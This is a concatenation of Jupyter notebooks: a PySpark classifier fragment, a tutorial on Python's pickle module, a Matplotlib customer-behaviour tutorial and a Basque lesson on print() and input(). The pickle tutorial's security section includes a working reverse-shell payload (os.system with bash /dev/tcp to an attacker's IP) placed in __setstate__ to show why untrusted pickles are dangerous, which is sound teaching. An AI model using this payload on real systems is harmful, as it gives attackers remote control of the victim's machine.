evaluators = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET')
print(evaluatorv.evaluate(predictionsv, {evaluatorv.metricName: "areaUnderROC"}))
from pyspark.ml.tuning import ParamGridBuilder, CrossValidator
paramGridv = (ParamGridBuilder()
.addGrid(gbtv.maxDepth, [2, 4, 6])
.addGrid(gbtv.maxBins, [20, 60])
.addGrid(gbtv.maxIter, [10, 20])
.build())
cvv = CrossValidator(estimator=gbtv, estimatorParamMaps=paramGridv, evaluator=evaluatorv, numFolds=5)
# Run cross-validation. This can take a while, since a model is fit for every parameter combination in the grid on each of the 5 folds.
cvModelv = cvv.fit(trainv)
predictionsv = cvModelv.transform(testv)
evaluatorv.evaluate(predictionsv)
gbts = cl.GBTClassifier(maxIter=10, labelCol='TARGET',featuresCol = 'scaled_features')
gbtModels = gbts.fit(trains)
predictionss = gbtModels.transform(tests)
print(evaluators.evaluate(predictionss, {evaluators.metricName: "areaUnderROC"}))
from pyspark.ml.tuning import ParamGridBuilder, CrossValidator
paramGrids = (ParamGridBuilder()
.addGrid(gbts.maxDepth, [2, 4, 6])
.addGrid(gbts.maxBins, [20, 60])
.addGrid(gbts.maxIter, [10, 20])
.build())
cvs = CrossValidator(estimator=gbts, estimatorParamMaps=paramGrids, evaluator=evaluators, numFolds=5)
# Run cross-validation. This can take a while, since a model is fit for every parameter combination in the grid on each of the 5 folds.
cvModels = cvs.fit(trains)
predictionss = cvModels.transform(tests)
evaluators.evaluate(predictionss)
from pyspark.mllib.evaluation import MulticlassMetrics
preds_and_labels = predictionss.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction')
preds_and_labels = preds_and_labels.select(['prediction','label'])
metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple))
print(metrics.confusionMatrix().toArray())
print(metrics.confusionMatrix())
print(metrics.precision(0.0))
print(metrics.recall(0.0))
###Output
DenseMatrix([[8.6404e+04, 2.0000e+01],
[2.3240e+03, 4.0000e+00]])
0.9738075917410512
0.9997685828010737
|
Python/05. Modules/01.2 pickle.ipynb | ###Markdown
Persist Objects in Python Table of Contents * [Serialization in Python](serialization_in_python)* [Inside the Python pickle Module](inside_the_python_pickle_module)* [Protocol Formats of the Python pickle Module](protocol_formats_of_the_python_pickle_module)* [Picklable and Unpicklable Types](picklable_and_unpicklable_types)* [Compression of Pickled Objects](compression_of_pickled_objects)* [Security Concerns With the Python pickle Module](security_concerns_with_the_python_pickle_module)* [ Conclusion](_conclusion)--- As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python `pickle` module. In this section, you’ll learn:- What it means to **serialize** and **deserialize** an object- Which **modules** you can use to serialize objects in Python- Which kinds of objects can be serialized with the Python `pickle` module- How to use the Python pickle module to serialize **object hierarchies**- What the **risks** are when deserializing an object from an untrusted sourceLet’s get pickling! Serialization in Python The **serialization** process is a way to convert a data structure into a linear form that can be stored or transmitted over a network. In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as **marshalling**. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called **deserialization** or **unmarshalling**. Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training. Python offers three different modules in the standard library that allow you to serialize and deserialize objects:1. The [`marshal`](https://docs.python.org/3/library/marshal.html) module2. The [`json`](https://docs.python.org/3/library/json.html) module3. The [`pickle`](https://docs.python.org/3/library/pickle.html) module In addition, Python supports [`XML`](https://www.xml.com/axml/axml.html), which you can also use to serialize objects. The `marshal` module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the `.pyc` files you get when the interpreter imports a Python module. So, even though you can use `marshal` to serialize some of your objects, it’s not recommended. The `json` module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange. There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the `json` module, you can serialize and deserialize several standard Python types:- `bool`- `dict`- `int`- `float`- `list`- `string`- `tuple`- `None` The Python `pickle` module is another way to serialize and deserialize objects in Python. It differs from the `json` module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects. 
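As a quick illustration of the `json` module handling exactly those standard types, here is a minimal sketch (the variable names are just for the example):

```python
import json

data = {
    "a_bool": True,
    "an_int": 35,
    "a_float": 3.14,
    "a_list": [1, 2, 3],
    "a_tuple": (4, 5),   # tuples are serialized as JSON arrays
    "nothing": None,
}

text = json.dumps(data)              # serialize to a human-readable string
print(text)
print(json.loads(text)["a_tuple"])   # note: it comes back as a list, [4, 5]
```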
**Note:** From now on, you’ll see the terms **pickling** and **unpickling** used to refer to serializing and deserializing with the Python `pickle` module. So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case. Here are three general guidelines for deciding which approach to use:1. Don’t use the `marshal` module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.2. The `json` module and XML are good choices if you need interoperability with different languages or a human-readable format.3. The Python `pickle` module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with `pickle`. Inside the Python pickle Module The Python pickle module basically consists of four methods:```pythonpickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)``` The first two methods are used during the pickling process, and the other two are used during unpickling. The only difference between `dump()` and `dumps()` is that the first creates a file containing the serialization result, whereas the second returns a string. To differentiate `dumps()` from `dump()`, it’s helpful to remember that **the `s` at the end of the function name stands for `string`**. The same concept also applies to `load()` and `loads()`: The first one reads a file to start the unpickling process, and the second one operates on a string. Consider the following example. Say you have a custom-defined class named `example_class` with several different attributes, each of a different type:- `a_number`- `a_string`- `a_dictionary`- `a_list`- `a_tuple` The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in another variable, restoring an exact copy of the previously pickled class:
###Code
# pickling.py
import pickle
class example_class:
a_number = 35
a_string = "hey"
a_list = [1, 2, 3]
a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
a_tuple = (22, 23)
my_object = example_class()
my_pickled_object = pickle.dumps(my_object) # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")
my_object.a_dict = None
my_unpickled_object = pickle.loads(my_pickled_object) # Unpickling the object
print(f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")
###Output
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}
###Markdown
In the example above, you create several different objects and serialize them with `pickle`. This produces a single string with the serialized result. The pickling process ends correctly, storing your entire instance in this string: `b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'`. After the pickling process ends, you modify your original object by setting the attribute `a_dict` to `None`. Finally, you unpickle the string to a completely new instance. What you get is a deep copy of your original object structure from the time that the pickling process began. Protocol Formats of the Python pickle Module As mentioned above, the `pickle` module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the `pickle` module has evolved over time. This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process. There are currently six different protocols that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling. - **Protocol version 0** was the first version. Unlike later protocols, it’s human readable.- **Protocol version 1** was the first binary format.- **Protocol version 2** was introduced in Python 2.3.- **Protocol version 3** was added in Python 3.0. It can’t be unpickled by Python 2.x.- **Protocol version 4** was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.- **Protocol version 5** was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data. Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use. To identify the highest protocol that your interpreter supports, you can check the value of the `pickle.HIGHEST_PROTOCOL` attribute.
###Code
pickle.HIGHEST_PROTOCOL
###Output
_____no_output_____
###Markdown
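Before looking at protocol selection in more detail, here is a minimal sketch (the file name is just an illustration) of the file-based counterparts `dump()` and `load()`, with the protocol pinned explicitly:

```python
import pickle

data = {"first": "a", "second": 2, "third": [1, 2, 3]}

# Write the pickled bytes to a file, choosing the protocol explicitly.
with open("data.pkl", "wb") as f:
    pickle.dump(data, f, protocol=pickle.HIGHEST_PROTOCOL)

# Read it back; the protocol used is recorded in the pickled data itself.
with open("data.pkl", "rb") as f:
    restored = pickle.load(f)

print(restored == data)  # True
```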
To choose a specific protocol, you need to specify the protocol version when you invoke `load()`, `loads()`, `dump()` or `dumps()`. If you don’t specify a protocol, then your interpreter will use the default version specified in the `pickle.DEFAULT_PROTOCOL` attribute. Picklable and Unpicklable Types You’ve already learned that the Python `pickle` module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others. If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as `dill`. The `dill` module extends the capabilities of `pickle`. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others. To test this module, you can try to pickle a `lambda` function. If you try to run this program, then you will get an exception because the Python `pickle` module can’t serialize a `lambda` function:
###Code
# pickling_error.py
import pickle
square = lambda x : x * x
my_pickle = pickle.dumps(square)
###Output
_____no_output_____
###Markdown
Now try replacing the Python `pickle` module with `dill` to see if there’s any difference. If you run this code, then you’ll see that the `dill` module serializes the `lambda` without returning an error:
###Code
# pickling_dill.py
import dill
square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)
###Output
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_create_code\nq\x01(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x02N\x85q\x03)X\x01\x00\x00\x00xq\x04\x85q\x05X\x1f\x00\x00\x00<ipython-input-17-fd95d6aa4b4e>q\x06X\x08\x00\x00\x00<lambda>q\x07K\x04C\x00q\x08))tq\tRq\nc__builtin__\n__main__\nh\x07NN}q\x0bNtq\x0cRq\r.'
###Markdown
**Note:** Before you use `dill` instead of pickle, keep in mind that `dill` is not included in the standard library of the Python interpreter and is typically slower than `pickle`. Another interesting feature of `dill` is that it can even serialize an entire interpreter session. Here’s an example:
###Code
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
###Output
_____no_output_____
###Markdown
In this example, you start the interpreter, import a module, and define a `lambda` function along with a couple of other variables. You then import the `dill` module and invoke `dump_session()` to serialize the entire session. If everything goes okay, then you should get a `test.pkl` file in your current directory. Now you can start a new instance of the interpreter and load the `test.pkl` file to restore your last session:
###Code
>>> globals().items()
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
>>> a
>>> b
>>> square
###Output
_____no_output_____
###Markdown
The first `globals().items()` statement demonstrates that the interpreter is in the initial state. This means that you need to import the `dill` module and call `load_session()` to restore your serialized interpreter session. Even though `dill` lets you serialize a wider range of objects than `pickle`, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for `dill`. So, how can you solve this problem? The solution in this case is to exclude the object from the serialization process and to **reinitialize** the connection after the object is deserialized. In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with `__getstate__()`:
###Code
# custom_pickling.py
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
import pickle
import json
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
###Output
{'a': 35, 'b': 'test'}
###Markdown
In this example, you create an object with three attributes. Since one attribute is a `lambda`, the object is unpicklable with the standard `pickle` module. To address this issue, you specify what to pickle with `__getstate__()`. You first clone the entire `__dict__` of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable `c` attribute. If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the `c` attribute. But what if you wanted to do some additional initializations while unpickling, say by adding the excluded `c` object back to the deserialized instance? You can accomplish this with `__setstate__()`.
###Code
# custom_unpickling.py
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
def __setstate__(self, state):
self.__dict__ = state
self.c = lambda x: x * x
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
###Output
{'a': 35, 'b': 'test', 'c': <function foobar.__setstate__.<locals>.<lambda> at 0x7f2704f81a70>}
###Markdown
By passing the excluded `c` object to `__setstate__()`, you ensure that it appears in the `__dict__` of the unpickled string. Compression of Pickled Objects Although the `pickle` data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it with `bzip2` or `gzip`. To compress a pickled string with `bzip2`, you can use the `bz2` module provided in the standard library. In the following example, you’ll take a string, pickle it, and then compress it using the `bz2` library:
###Code
>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259
###Output
_____no_output_____
###Markdown
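The same idea works with `gzip` from the standard library; here is a minimal sketch reusing the `pickled` bytes from the example above:

```python
import gzip

# Compress the pickled bytes with gzip instead of bz2.
gzip_compressed = gzip.compress(pickled)
print(len(gzip_compressed))

# Decompressing and unpickling restores the original string.
assert pickle.loads(gzip.decompress(gzip_compressed)) == my_string
```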
When using compression, bear in mind that smaller files come at the cost of a slower process. Security Concerns With the Python pickle Module You now know how to use the `pickle` module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network. However, there’s one more thing you need to know about the Python `pickle` module: It’s not secure. Do you remember the discussion of `__setstate__()`? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process! So, what can you do to reduce this risk? Sadly, not much. The rule of thumb is to **never unpickle data that comes from an untrusted source or is transmitted over an insecure network**. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as `hmac` to sign the data and ensure it hasn’t been tampered with. The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:
###Code
# remote.py
import pickle
import os
class foobar:
def __init__(self):
pass
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
# The attack is from 192.168.1.10
# The attacker is listening on port 8080
os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')
pickle.dump(foobar(), open("./bad.pkl", 'wb'))
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
###Output
_____no_output_____ |
tutorials/Visualize_Customer_Behavior.ipynb | ###Markdown
Context In this tutorial, we are using sample data from Unbounce. Unbounce is a subscription-based tool that helps marketers to publish and optimize landing pages for a high conversion rate. For this tutorial, the data includes events and subscription information for 4 accounts. No personal information is included, and account unique identifications have been changed to ensure security. Load Data Customer behavior data usually includes date and time events, the moments when customers do a particular action. In this tutorial, we will look into events for account republish (`republished_df`) and login (`login_df`). We also have subscription information for each customer (`subscription_info_df`). A customer can have multiple subscriptions, but each subscription is mutually exclusive. A new subscription for a customer only starts when he/she churns (meaning stops paying) and then re-subscribes. We call this person a flapper.
###Code
republished_df = pd.read_csv("../data/visualize-customer-behavior/republished_sample.csv")
login_df = pd.read_csv("../data/visualize-customer-behavior/login_sample.csv")
subscription_info_df = pd.read_csv("../data/visualize-customer-behavior/subscription_info.csv")
republished_df.head()
login_df.head()
subscription_info_df.head()
###Output
_____no_output_____
###Markdown
Transform Data Before going into the visualization, we need to transform the date columns to date-time format. Right now, Python thinks that they are a bunch of strings, so the dates will not be sorted in chronological order.
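As a quick illustration of why this matters, a minimal sketch with made-up dates shows that strings sort character by character rather than chronologically:

```python
import pandas as pd

dates_as_text = pd.Series(["2019/11/02", "2019/2/01"])
print(dates_as_text.sort_values().tolist())                  # November sorts before February!
print(pd.to_datetime(dates_as_text).sort_values().tolist())  # chronological order
```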
###Code
republished_df['action_date'] = pd.to_datetime(republished_df['action_date'])
login_df['action_date'] = pd.to_datetime(login_df['action_date'])
subscription_info_df['subscription_starts_at'] = pd.to_datetime(subscription_info_df['subscription_starts_at'])
subscription_info_df['subscription_ends_at'] = pd.to_datetime(subscription_info_df['subscription_ends_at'])
sample_subscription = subscription_info_df[subscription_info_df['AccountCode'] == 'a']
sample_republished = republished_df[republished_df['AccountCode'] == 'a']
sample_login = login_df[login_df['AccountCode'] == 'a']
# this is a constant for visualization purpose
sample_subscription['vizline'] = 0.5
sample_republished['vizline'] = 0.5
sample_login['vizline'] = 0.5
###Output
_____no_output_____
###Markdown
Visualize **TIP 1: Is this account a same-day flapper? Let's mix some colors!** **This tip is handy when we need to visualize different events that only happen once, but they may happen on the same day**. Like any subscription-based company, Unbounce expects flappers -- subscribers who subscribe, churn, then come back at some point in time. There are cases when churn and re-subscription happen on the **same** date. To distinguish same-day flappers, we can use this color mixing trick. *Note: we assume here that each subscription is mutually exclusive to another.* If we visualize `subscription start date` with a different color than `subscription end date` and use some opacity level, we will have a different color for same-day flappers. For example, here I choose **blue** for `subscription start date` and **red** for `subscription end date`, and change the opacity level through `alpha = 0.5` (`alpha` ranges from 0 to 1). This results in **magenta** for same-day flappers. You can learn more about the basics of color mixing through this article: https://mymodernmet.com/color-mixing-chart/. Here is a list of color codes in Matplotlib: https://matplotlib.org/examples/color/named_colors.html
###Code
fig, ax = plt.subplots(figsize=(20, 5))
ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'],
marker='|', linewidth = 0.1,
markersize=50, mew=2, alpha=0.5,
color='royalblue', label='Subscription Starts')
no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'],
linewidth = 0.1, marker='|',
markersize=50, mew=2, alpha=0.5,
color='crimson', label='Subscription Ends')
ax.legend(loc='upper left', ncol=2)
ax.set_title("Customer Behavior")
# Remove y-axis ticks as we don't need it
ax.get_yaxis().set_visible(False)
###Output
_____no_output_____
###Markdown
From the chart above, we know that this account is a flapper with 4 subscriptions. On the last subscription, he/she is a same-day flapper. The last subscription started when the 3rd one ended, and thus we see magenta instead of blue or red here. Besides colors and alpha, there are more parameters in the `axes.plot()` function that you can play around with depending on how you want to design your chart, such as the type of marker and the marker size (we will go into more details for `marker` in the next tip). Read more about these parameters here: https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.axes.Axes.plot.html **TIP 2: What is the frequency and intensity of each action? Let's use different shapes and opacity levels** **This tip is handy when we need to visualize different events that can happen multiple times on the same day.** Because Unbounce is a tool that helps marketers to publish and optimize their landing pages, we care about republish events. We want to understand: * How often do customers republish their page compared to logging in to the tool? * How much/intensively do customers republish each time they login? To help answer these questions, we need to plot login and republish events on the same chart. There are 2 problems with this: * Customers can login and republish on the same day * Customers can do these actions many times on the same day And to solve these problems, we can use different shapes (through `marker`) and opacity levels (through `alpha`) in the `axes.plot()` function. There are many marker types, but here I use *circles* for logins and *triangles* for republishes. You can find out other types here: https://matplotlib.org/3.1.1/api/markers_api.html#module-matplotlib.markers
###Code
fig, ax = plt.subplots(figsize=(20, 5))
# Plot subscription starts and ends
ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'],
marker='|', linewidth = 0.1,
markersize=50, mew=2, alpha=0.5,
color='royalblue', label='Subscription Starts')
no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'],
linewidth = 0.1, marker='|',
markersize=50, mew=2, alpha=0.5,
color='crimson', label='Subscription Ends')
# Plot login and republish events
ax.plot(sample_login['action_date'], sample_login['vizline'],
marker='o', markersize=11,
alpha=0.3, color='darkseagreen',
linewidth=0.1, label='Login')
ax.plot(sample_republished['action_date'], sample_republished['vizline'],
marker='^', markersize=8,
alpha=0.5, color='teal',
linewidth=0.1, label='Republish')
ax.legend(loc='upper left', ncol=4)
ax.set_title("Customer Behavior")
ax.get_yaxis().set_visible(False)
###Output
_____no_output_____
###Markdown
From the chart above, we can answer the two behavior questions: * **How often do customers republish their page compared to logging in to the tool?** -- During the first subscription, this customer logged in and republished almost every 2 weeks, but this frequency has reduced in the following subscriptions. There are times when they logged in without republishing a page. * **How much/intensively do customers republish each time they login?** -- During all subscriptions, this account tends to republish many times when they log in, hence we see darker-colored triangles. This suggests that they may republish every time they make changes to preview the page. TIP 3: How is this account behavior compared to another's? Let's make sure we look at the same scale **This tip is especially handy when you want to compare one entity to another.** If we only look into one customer, we don't know whether this customer is a highly-engaged one, or whether this is the norm for all of our customer base. Although there are other statistical methods to check on customer behavior trends (especially when you have more customers than you can manually check), we can start by visualizing the behavior of different customers and comparing them together. I like this method as an exploratory analysis, because besides talking to customer-facing teams, it helps suggest hypotheses to confirm/deny with statistical models later on. To make a more reasonable comparison, we want to make sure the charts use the same scale. There can be customers who start their subscriptions early in the year, while some others start mid-year or at the end of the year. In this case, I want to limit my chart to show a date range from January 1st to December 31st. We can use the `axes.set_xlim()` function for this. Read more about `axes.set_xlim()` here: https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.axes.Axes.set_xlim.html
###Code
fig, ax = plt.subplots(figsize=(20, 5))
# Plot subscription starts and ends
ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'],
marker='|', linewidth = 0.1,
markersize=50, mew=2, alpha=0.5,
color='royalblue', label='Subscription Starts')
no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'],
linewidth = 0.1, marker='|',
markersize=50, mew=2, alpha=0.5,
color='crimson', label='Subscription Ends')
# Plot login and republish events
ax.plot(sample_login['action_date'], sample_login['vizline'],
marker='o', markersize=11,
alpha=0.3, color='darkseagreen',
linewidth=0.1, label='Login')
ax.plot(sample_republished['action_date'], sample_republished['vizline'],
marker='^', markersize=8,
alpha=0.5, color='teal',
linewidth=0.1, label='Republish')
# Limit date range
datemin = pd.to_datetime('2019/01/01').date()
datemax = pd.to_datetime('2019/12/31').date()
ax.set_xlim(datemin, datemax)
# Format date
date_form = mdates.DateFormatter("%Y/%m/%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure ticks fall once every other week (interval=2)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=2))
ax.xaxis.set_tick_params(rotation=40)
ax.legend(loc='upper left', ncol=4)
ax.set_title("Customer Behavior")
ax.get_yaxis().set_visible(False)
###Output
_____no_output_____
###Markdown
TIP 4: Make it reproducible I'm a big fan of the rule of three inspired by [David Robinson](http://varianceexplained.org/r/ds-ml-ai/).> When you’ve written the same code 3 times, write a function. Since we're going to visualize the behavior of 4 customers in the dataset (obviously this is more than 3), I want to write a function. I love functions because we can make systematic changes to visualizations and save so much time copy-pasting those changes to each chart.
###Code
def _get_sample_data(AccountCode):
"""This function gets subscription info, login events and republish events for the AccountCode input.
Args:
AccountCode (str): Account unique identification.
Returns:
pandas.core.frame.DataFrame: 3 dataframes with subscription info, login and republish events.
"""
sample_subscription = subscription_info_df[subscription_info_df['AccountCode'] == AccountCode]
sample_republished = republished_df[republished_df['AccountCode'] == AccountCode]
sample_login = login_df[login_df['AccountCode'] == AccountCode]
# this is a constant for visualization purpose
sample_subscription['vizline'] = 0.5
sample_republished['vizline'] = 0.5
sample_login['vizline'] = 0.5
return sample_subscription, sample_republished, sample_login
def _visualize_customer_behavior(AccountCode):
"""This function visualizes customer behavior using subscription, login and republish events of a customer.
Args:
AccountCode (str): Account unique identification.
Returns:
matplotlib.figure.Figure: a visualization with subscription, login and republish events of a customer.
"""
sample_subscription, sample_republished, sample_login = _get_sample_data(AccountCode)
fig, ax = plt.subplots(figsize=(20, 5))
# Plot subscription starts and ends
ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'],
marker='|', linewidth = 0.1,
markersize=50, mew=2, alpha=0.5,
color='royalblue', label='Subscription Starts')
no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'],
linewidth = 0.1, marker='|',
markersize=50, mew=2, alpha=0.5,
color='crimson', label='Subscription Ends')
# Plot login and republish events
ax.plot(sample_login['action_date'], sample_login['vizline'],
marker='o', markersize=11,
alpha=0.3, color='darkseagreen',
linewidth=0.1, label='Login')
ax.plot(sample_republished['action_date'], sample_republished['vizline'],
marker='^', markersize=8,
alpha=0.5, color='teal',
linewidth=0.1, label='Republish')
# Limit date range
datemin = pd.to_datetime('2019/01/01').date()
datemax = pd.to_datetime('2019/12/31').date()
ax.set_xlim(datemin, datemax)
# Show weekly date
date_form = mdates.DateFormatter("%Y/%m/%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure ticks fall once every other week (interval=2)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=2))
ax.xaxis.set_tick_params(rotation=40)
ax.legend(loc='upper left', ncol=4)
ax.set_title("Customer Behavior")
ax.get_yaxis().set_visible(False)
return fig
_ = _visualize_customer_behavior('a')
_ = _visualize_customer_behavior('b')
_ = _visualize_customer_behavior('c')
_ = _visualize_customer_behavior('d')
###Output
_____no_output_____ |
KonputaziorakoSarrera-MAT/Gardenkiak/Oinarrizko datu sarrera eta irteera.ipynb | ###Markdown
Basic data input and output As we saw in previous sections, we use the `print()` function to display information on the screen. In this section we will also look at another basic input/output function, namely `input()` (both of these functions, and all the others seen in previous sections, are defined in Python's [*Built-in Functions*](https://docs.python.org/3/library/functions.html) set). The `print()` function This function is used to display information as text: it receives a collection of objects and shows the value of each one as text:
###Code
a = 1
b = 3.4
c = "kaixo"
print(a,b,c)
###Output
1 3.4 kaixo
###Markdown
The objects we pass to `print()` are turned into character strings via the `str()` function, and those strings are then displayed on the screen. Even though we said the function receives objects, we can use expressions when calling it (the object passed to the function will be the result of the expression):
###Code
print(a*4, b>=2, c+"?")
###Output
4 True kaixo?
###Markdown
The arguments of Python functions can have default values. The `print()` function has four such arguments, which can be used to change its behaviour (if nothing is specified, they take their default value):
###Code
help(print)
###Output
Help on built-in function print in module builtins:
print(...)
print(value, ..., sep=' ', end='\n', file=sys.stdout, flush=False)
Prints the values to a stream, or to sys.stdout by default.
Optional keyword arguments:
file: a file-like object (stream); defaults to the current sys.stdout.
sep: string inserted between values, default a space.
end: string appended after the last value, default a newline.
flush: whether to forcibly flush the stream.
###Markdown
* `sep` → the character string inserted between values (by default, a space). * `end` → the character string appended at the end (by default, a new line). * `file` → *where* to write (by default, standard output). * `flush` → whether or not to force flushing. The `print()` function is peculiar in that it takes an unlimited number of arguments. Because of this, if we want to give the `sep`, `end`, `file` or `flush` arguments a different value, we have to use their name (this can always be done):
###Code
print(a*4, b>=2, c+"?", sep=" <--> ", end="\nTHE END\n")
###Output
4 <--> True <--> kaixo?
THE END
###Markdown
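As an aside, the `file` argument works the same way; here is a minimal sketch (the file name is just an illustration) that sends the output to a text file instead of the screen:

```python
# Redirect print() output to a file through the file argument.
with open("output.txt", "w") as f:
    print(1, 3.4, "kaixo", sep=" | ", file=f)
```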
Naming the arguments also lets us specify them in any order:
###Code
print(a*4, b>=2, c+"?", end="\nTHE END\n", sep=" <--> ")
###Output
4 <--> True <--> kaixo?
THE END
###Markdown
Arguments specified by name are called *keyword* arguments, and they must always appear at the end:
###Code
print(end="\nTHE END\n", sep=" <--> ", a*4, b>=2, c+"?")
###Output
_____no_output_____
###Markdown
The `input()` function The `input()` function uses the system's standard input to receive information from the user through the keyboard. It halts execution until the user presses the *return* key, and then returns the text the user typed:
###Code
a = input()
print("Ados,",a,"idatzi duzu")
###Output
12345
Ados, 12345 idatzi duzu
###Markdown
The `input()` function has a `prompt` argument whose default value is `''`:
###Code
help(input)
###Output
Help on method raw_input in module ipykernel.kernelbase:
raw_input(prompt='') method of ipykernel.ipkernel.IPythonKernel instance
Forward raw_input to frontends
Raises
------
StdinNotImplentedError if active frontend doesn't support stdin.
###Markdown
* `prompt` → the message shown on the screen (by default, empty). With this argument, we let the user know that we are waiting for them:
###Code
a = input("Idatzi balio bat: ")
print("Ados,",a,"idatzi duzu")
###Output
Idatzi balio bat: 12345
Ados, 12345 idatzi duzu
###Markdown
Two things to always keep in mind: 1. **SOMETHING** must be done with what `input()` returns (**store it**, for example). 2. The `input()` function returns a **CHARACTER STRING** (**it is not a number**).
###Code
a = input("Idatzi balio bat: ")
print("Jasotako", a, "balioa", type(a), "motakoa da")
print("a * 2 :" , a*2)
a = int(a)
print("Orain", a, "balioa", type(a), "motakoa da")
print("a * 2 :" , a*2)
###Output
Idatzi balio bat: 12345
Jasotako 12345 balioa <class 'str'> motakoa da
